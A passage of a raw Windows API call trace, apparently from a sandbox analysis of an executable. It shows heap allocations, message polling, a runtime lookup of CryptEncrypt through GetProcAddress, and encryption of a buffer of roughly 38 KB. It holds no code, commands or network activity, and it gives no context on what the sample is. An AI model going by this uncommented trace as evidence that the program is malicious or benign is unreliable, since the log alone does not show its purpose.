HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0210.929] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0210.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0210.929] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0210.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0210.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0210.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0210.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0210.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0210.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0210.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0210.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0210.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0210.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0210.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0210.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0210.930] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0210.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0210.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0210.930] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0210.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0210.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0210.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0210.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0210.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0210.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0210.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0210.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0210.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0210.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0210.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0210.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0210.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0210.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0210.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0210.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0210.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0210.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x96cc) returned 0x2f404a0 [0210.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f404a0 | out: hHeap=0x970000) returned 1 [0210.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0210.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0210.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0210.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0210.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0210.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0210.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0210.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0210.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0210.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0210.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0210.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0210.934] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0210.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0210.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0210.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0210.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0210.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0210.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0210.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0210.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0210.935] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0210.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0210.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0210.935] CryptEncrypt (in: hKey=0xa87350, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x96cc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x96d0) returned 1 [0210.935] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.935] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0210.936] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.936] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.936] CharLowerBuffW (in: lpsz="byte[38608]", cchLength=0xb | out: lpsz="byte[38608]") returned 0xb [0210.936] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.940] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0210.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0210.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0210.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0210.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0210.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0210.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0210.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0210.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0210.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0210.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0210.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0210.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0210.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0210.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0210.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0210.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0210.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0210.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0210.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0210.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0210.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0210.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0210.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0210.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x96cc) returned 0x2e80330 [0210.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0210.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0210.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0210.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0210.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0210.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0210.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0210.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0210.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.948] HeapFree (in: hHeap=0x970000, 